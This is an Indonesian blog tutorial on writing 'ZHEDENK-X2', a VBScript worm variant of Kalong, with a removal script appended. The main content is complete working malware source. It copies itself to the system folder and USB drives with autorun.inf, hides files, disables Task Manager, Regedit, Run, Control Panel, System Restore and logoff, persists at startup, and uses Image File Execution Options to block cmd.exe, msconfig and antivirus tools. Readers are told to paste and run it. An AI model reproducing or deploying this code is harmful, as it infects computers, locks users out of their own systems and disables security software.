Baik sekarang varian selanjutnya dari Kalong. ZHEDENK-X2. Kelihatannya banyak yang nunggu-nunggu nig. Ayo kita coding di Notepad kode ini, kalau malas tinggal Copy > Paste
Kalo ada yang belum pernah lihat Membuat Virus menggunakan Notepad 2 bisa baca disini dulu.
'Zhedenk-X2
'Varian dari Kalong.VBS
on error resume next
'Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,zhedenk,nt,check,sd
'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe zh3d3nk.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39
'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=longka.getfile(desades.path &"\zh3d3nk.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\zh3d3nk.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\zh3d3nk.sys.vbs")
tf.attributes = 39
set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
'Manipulasi Registry
set zhedenk = createobject("WScript.Shell")
'Ubah IE Title
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"
'File Hidden tak terlihat
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
'Blokir Find, FolderOptions, Run, Regedit, Task Manager, System Restore, perubahan Wallpaper, Hotkey, Control Panel, dan Log Off
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
'Ubah tulisan pertama pada text box menu RUN
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"
'Buat pesan saat Windows Startup
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"
'Aktifkan saat Windows Startup
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"
'Ubah Default Start Page Internet Explorer
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com"
'Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",”“
'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Iya… seperti biasa klik FILE > SAVE. Di save as type pilih “ALL FILES” dan simpan dengan nama “zh3d3nk.sys.vbs”. Dan jalankan, sudah saya cek ulang jadi tidak ada kesalahan lagi.
Nah, sekarang kita akan buat Removal (antidot) dari virus ini. Pertama stop process yang bernama : wscript.exe. (jangan pake Task Manager, pake tool penggantinya, apa kek)
Coding juga dengan Notepad :
'ANTI-KALONGX2
Dim Zhedenk
set zhedenk = createobject("WScript.Shell")
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "0", "REG_DWORD"
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","INTERNET EXPLORER"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", ""
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.google.com"
Simpan dengan nama “zhedenkx2removal.vbs”. Lalu jalankan deh…. Seperti biasa ya, membuat virus dan anti-nya dengan Notepad pula. Semoga bermanfaat. Dan jika ada penyalah-gunaan saya tak bertanggung jawab.
Share
Popular
-
Sebenarnya artikel ini telah di bahas dan di kupas tuntas di situs : http://bocaherror.wordpress.com/ milik salah satu netter yang gemar me...
-
Berikut ini merupakan contoh script PHP dan MySQL sederhana yang akan menampilkan dan pengolahan data pegawai. Fitur dari contoh ini: Hala...
-
Setelah sebelumnya kita membahas mengenai bagaimana baca tulis file CSV dengan PHP, maka pada tutorial ini akan dibahas mengenai baca tul...
-
Tutorial Dreamweaver - Aplikasi Pencarian Data Mahasiswa Download Link
-
Berikut source code aplikasi sistem pakar diagnosis kerusakan pada Televisi berwarna. Dibuat dengan Visual Basic 6 dengan database Microso...
0 comments:
Post a Comment